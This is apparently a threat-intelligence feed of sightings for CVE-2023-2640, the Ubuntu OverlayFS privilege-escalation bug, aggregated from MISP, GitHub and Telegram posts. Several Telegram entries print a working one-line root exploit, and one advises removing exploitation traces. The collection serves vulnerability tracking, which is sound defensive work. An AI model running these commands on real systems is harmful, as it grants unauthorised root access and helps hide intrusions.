{"vulnerability": "cve-2023-2640", "sightings": [{"uuid": "2d2b52b5-a8f5-427e-9ca7-4bff0fa9e47b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "MISP/851cd517-5e71-4cbc-ac92-bb9c2c9b1499", "content": "", "creation_timestamp": "2024-04-19T09:48:27.000000Z"}, {"uuid": "9a473ba7-93a3-490d-863a-0bb618824cfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "7497faf0-84fd-4bbb-b41a-0d23b0172b53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2023-2640", "type": "seen", "source": "https://gist.github.com/okfull/f7286f6cee1de1888e21dfc6de914ebc", "content": "", "creation_timestamp": "2025-02-15T04:06:07.000000Z"}, {"uuid": "a0a42048-495e-4fc0-be7e-2f663c18771c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:52.000000Z"}, {"uuid": "64ab409f-9b08-40c6-b227-2ff0bce60ee1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:00.000000Z"}, {"uuid": "8224b59d-dc7f-4187-83d9-201815cec15e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/road_to_oscp/266", "content": "#ubuntu #privesc\n\nGameOver(lay) Ubuntu Privilege Escalation\n\nThanks to: @Ikelt  (his channel)\n\nhttps://github.com/g1vi/CVE-2023-2640-CVE-2023-32629", "creation_timestamp": "2023-10-12T23:20:02.000000Z"}, {"uuid": "94b82dea-4cf5-4508-b72b-3ae54035cd27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "Telegram/0wrqT-Y0ZT6aZxb3G7dw-myGUZ24NYkbA_Q0tAhYejl60HA", "content": "", "creation_timestamp": "2025-07-16T03:00:05.000000Z"}, {"uuid": "0d1f5c59-c4f1-4049-96ac-c10340c4ad73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/gameoverlay_privesc.rb", "content": "", "creation_timestamp": "2024-12-18T20:51:38.000000Z"}, {"uuid": "9dbd7564-07ba-4788-9c2b-d2e86b6224c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5154", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aGameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit  in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0\nURL\uff1ahttps://github.com/luanoliveira350/GameOverlayFS\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-09-17T23:31:29.000000Z"}, {"uuid": "c11a12eb-ad3f-46d7-944d-b7c7db398fc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4869", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aJuju: GameOver(lay) CVE-2023-2640 and CVE-2023-32629 patcher\nURL\uff1ahttps://github.com/johnlettman/juju-patch-gameoverlay\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-08-04T18:39:02.000000Z"}, {"uuid": "8c90ebfc-bde0-4902-874b-c29291bd7e1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4926", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-2640 CVE-2023-32629\nURL\uff1ahttps://github.com/OllaPapito/gameoverlay\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-08-15T19:13:54.000000Z"}, {"uuid": "55f2051b-64d1-492c-96a4-de8bca2c5f06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4982", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aJuju: GameOver(lay) CVE-2023-2640 and CVE-2023-32629 patcher\nURL\uff1ahttps://github.com/johnlettman/juju-scripts\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-08-24T18:38:28.000000Z"}, {"uuid": "32861857-2b80-46c4-bfda-129269406f38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5767", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aOne-Liner CVE-2023-32629/CVE-2023-2640 Ubuntu Privilege Escalation\nURL\uff1ahttps://github.com/k4but0/Ubuntu-LPE\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-11-11T14:35:10.000000Z"}, {"uuid": "18db98c6-7e89-4eeb-8942-116e227f6e27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5793", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-32629 &amp; CVE-2023-2640  Ubuntu Privilege Escalation POC\nURL\uff1ahttps://github.com/Umutkgz/CVE-2023-32629-CVE-2023-2640-Ubuntu-Privilege-Escalation-POC\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-11-14T08:43:11.000000Z"}, {"uuid": "4e9a8d32-f902-48f5-b83e-cb40748e4c9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5732", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aUbuntu Privilege Escalation bash one-liner using CVE-2023-32629 &amp; CVE-2023-2640\nURL\uff1ahttps://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-11-09T09:21:06.000000Z"}, {"uuid": "030f900f-5efa-4c4b-8c40-5a18165f17b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/78796", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #POC #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2023-2640-3262-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a z3usx01\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-04 19:00:12\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPOC exploits demonstrating OverlayFS-based local privilege escalation vulnerabilities in Ubuntu (CVE-2023-2640 &amp; CVE-2023-3262)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-04T19:00:32.000000Z"}, {"uuid": "61ed7721-8b9c-4cba-8e60-c0808197de86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "Telegram/LjSTrv-Iu2X1pwZwEm6tW7erIQPbnSZRqnOkapEQyNwszBE", "content": "", "creation_timestamp": "2026-04-05T03:00:05.000000Z"}, {"uuid": "c81cddfe-54e8-4f0d-8dab-48ec08882a4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/bh_cat/202", "content": "\ud83d\udcd5 \u041f\u043e\u0434\u0431\u043e\u0440\u043e\u0447\u043a\u0430 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udca1 Atlassian Confluence Server - Improper Authorization\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-22518\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c, \u0438\u043c\u0435\u044e\u0449\u0438\u043c \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0443 Confluence, \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0431\u0430\u0437\u0443 \u0434\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 Confluence \u0438, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\n\ud83d\udca1 Microsoft Message Queuing Remote Code Execution\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-21554\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435: \n- \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0435\u043c\u0443 \u0430\u0433\u0435\u043d\u0442\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c RCE-\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0430\u043a\u0435\u0442\u0430 Microsoft Messaging Queue.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\ud83d\udca1 Google Chrome heap buffer overflow in WebP \n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-4863\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x: \n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n-  \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u044c \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u043f\u0430\u043c\u044f\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u0443\u044e HTML-\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\u27bf\n\n\ud83d\udca1 Ubuntu Privilege Escalation (Double)\n\n\u041e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435:\nCVE-2023-2640\nCVE-2023-32629\n\u0421\u043a\u043e\u0440\u0438\u043d\u0433 CVSS3.x:\n\u270d\ufe0f\u270d\ufe0f\u270d\ufe0f\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435:\n- \u041d\u0430 \u044f\u0434\u0440\u0430\u0445 Ubuntu, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u043a\u0430\u043a c914c0e27eb0, \u0442\u0430\u043a \u0438 \"UBUNTU: SAUCE: overlayfs: \u041f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f trusted.overlayfs.* xattrs\", \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u043d\u044b\u0435 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u044b \u0434\u043b\u044f \u0441\u043c\u043e\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0438\u0445 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0434\u043b\u044f \u0432\u0435\u0440\u0445\u043d\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0431\u0435\u0437 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0445 \u043f\u0440\u043e\u0432\u0435\u0440\u043e\u043a \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n- \u041b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u044f\u0434\u0440\u0430\u0445 Ubuntu \u0412 \u044f\u0434\u0440\u0430\u0445 Ubuntu \u043e\u0432\u0435\u0440\u043b\u0435\u0439\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b ovl_copy_up_meta_inode_data \u043f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u043f\u0440\u0438 \u0432\u044b\u0437\u043e\u0432\u0435 ovl_do_setxattr.\nPOC\n\ud83c\udf10 \u0421\u0441\u044b\u043b\u043a\u0430\n\nunshare -rm sh -c \"mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*; python3 -c 'import os;os.setuid(0);os.system(\\\"/bin/bash\\\")'\"\n\n#poc", "creation_timestamp": "2023-11-10T11:18:42.000000Z"}, {"uuid": "6629819e-f81d-4389-84a4-0f6422a1d92d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3657", "content": "Ubuntu Privilege escalation\nCVE-2023-32629 &amp; CVE-2023-2640\n#linux #LPE #\u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0435\n\nPoC:\nunshare -rm sh -c \"mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*; python3 -c 'import os;os.setuid(0);os.system(\\\"/bin/bash\\\")'\"\n\n\ud83d\udccc \u041d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0439\u0442\u0435 \u0443\u0431\u0440\u0430\u0442\u044c \u0441\u043b\u0435\u0434\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 (\u043f\u0430\u043f\u043a\u0438 l u w m):\nrm -rf l u w m\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-02-05T13:01:28.000000Z"}, {"uuid": "41c66a84-d5b8-43aa-9bb1-3ccfa055d614", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "Telegram/CTnpALb3N4gRNOOR6pdTMCwNdnVLITHynoX5MxKBkUzk", "content": "", "creation_timestamp": "2024-05-03T15:51:20.000000Z"}, {"uuid": "dbf2bcf8-77b9-4bb3-b3d3-30a5a938c728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5153", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aGameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit  in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0\nURL\uff1ahttps://github.com/luanoliveira350/exploits\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-09-17T23:21:56.000000Z"}, {"uuid": "41e30cfa-86bc-41f3-8291-9a5725705d8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "Telegram/llJ3Zelv9khtFzEIlG9M-p5v3ilWpn3isYFK1mhnJTqX5Q", "content": "", "creation_timestamp": "2024-02-05T16:42:01.000000Z"}, {"uuid": "b6dc3cf5-253a-41cb-b2ff-6fbdb5f2a36e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "Telegram/C10Ukd6uaNmL2dCJ4JKu4FFYI3kxwifkbaampl1UlSSR", "content": "", "creation_timestamp": "2023-10-22T23:27:27.000000Z"}, {"uuid": "13af6935-67ed-47f8-b1e1-9155e59ebf69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/3547", "content": "https://gist.github.com/win3zz/aa1ac16c4458aaaec6dd79343b8cd46f\n\nCVE-2023-2640 and CVE-2023-32629", "creation_timestamp": "2023-11-12T08:40:42.000000Z"}, {"uuid": "50608044-e2fd-46d3-88ab-18c74963eff4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/LearnHacking1337/3755", "content": "\ud83d\udc4a CVE-2023-32629 &amp; CVE-2023-2640\n\ud83d\udc27 Ubuntu Privilege Escalation\n\nVulnerable kernels:\nKernel: 6.2.0 | Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish)\nKernel: 5.19.0 | Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)\nKernel: 5.4.0 | Ubuntu 22.04 LTS (Local Fossa) / Ubuntu 18.04 LTS (Bionic Beaver)\n\nCode:\nunshare -rm sh -c \"mkdir l u w m &amp;&amp; cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m &amp;&amp; touch m/*;\" &amp;&amp; u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash &amp;&amp; chmod 4755 /var/tmp/bash &amp;&amp; /var/tmp/bash -p &amp;&amp; rm -rf l m u w /var/tmp/bash\")'", "creation_timestamp": "2023-11-13T22:21:02.000000Z"}, {"uuid": "939c379d-3930-4e25-a401-be989ec2ec81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "Telegram/d4IDmhF_GY2RTUu1Rz7A6eV9z3DwFMVectxUjlKtekAM95Jp", "content": "", "creation_timestamp": "2023-07-28T12:18:45.000000Z"}, {"uuid": "2deb5365-f384-45f2-85a5-5fb311e109f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://t.me/arpsyndicate/873", "content": "#ExploitObserverAlert\n\nCVE-2023-2640\n\nDESCRIPTION: Exploit Observer has 26 entries related to CVE-2023-2640. On Ubuntu kernels carrying both c914c0e27eb0 and \"UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs\", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.\n\nFIRST-EPSS: 0.001990000\nNVD-IS: 5.9\nNVD-ES: 1.8", "creation_timestamp": "2023-12-02T01:17:59.000000Z"}, {"uuid": "1bcb5c9a-9e84-483f-87a9-a541c3f1e22a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://t.me/proxy_bar/1821", "content": "update \u0434\u043b\u044f CVE-2023-32629 \u0438 CVE-2023-2640\nBash\u0421\u0418\u0448\u0435\u0447\u043a\u0430 \u0442\u0430\u043a\u0430\u044f", "creation_timestamp": "2023-11-10T21:25:27.000000Z"}, {"uuid": "ccd2555a-67bc-4046-baa5-ae320d07e170", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "Telegram/YlvlGWigoWqKUGSG74wUL9v7qHEx1LQZk5XqaUDNLwgr", "content": "", "creation_timestamp": "2023-11-13T14:54:21.000000Z"}, {"uuid": "0ab4d76d-1906-4b8f-989f-ce186a818ea5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "seen", "source": "https://t.me/JerusalemElectronicArmy/498", "content": "#\u0623\u062e\u0628\u0627\u0631_\u0627\u0644\u0633\u0627\u064a\u0628\u0631 \n\n\u0627\u0643\u062a\u0634\u0641 \u0627\u0644\u0628\u0627\u062d\u062b\u0648\u0646 \u062b\u063a\u0631\u0627\u062a Linux \u0639\u0627\u0644\u064a\u0629 \u0627\u0644\u062e\u0637\u0648\u0631\u0629 \u0641\u064a \u0646\u0648\u0627\u0629 Ubuntu \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 40% \u0645\u0646 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u064a\u0646.\nGameOver(lay) CVE-2023-32629 \u0648 CVE-2023-2640\n#\u062c\u064a\u0634_\u0627\u0644\u0642\u062f\u0633_\u0627\u0644\u0625\u0644\u0643\u062a\u0631\u0648\u0646\u064a", "creation_timestamp": "2023-07-29T10:51:52.000000Z"}, {"uuid": "79f12427-2d0a-4731-b6d8-0887bf52ccce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-2640", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1820", "content": "CVE-2023-32629 \u0438 CVE-2023-2640\nUbuntu Privilege Escalation\n*\nBASH \u043e\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u043e\u0439:\nunshare -rm sh -c \"mkdir l u w m &amp;&amp; cp /u*/b*/p*3 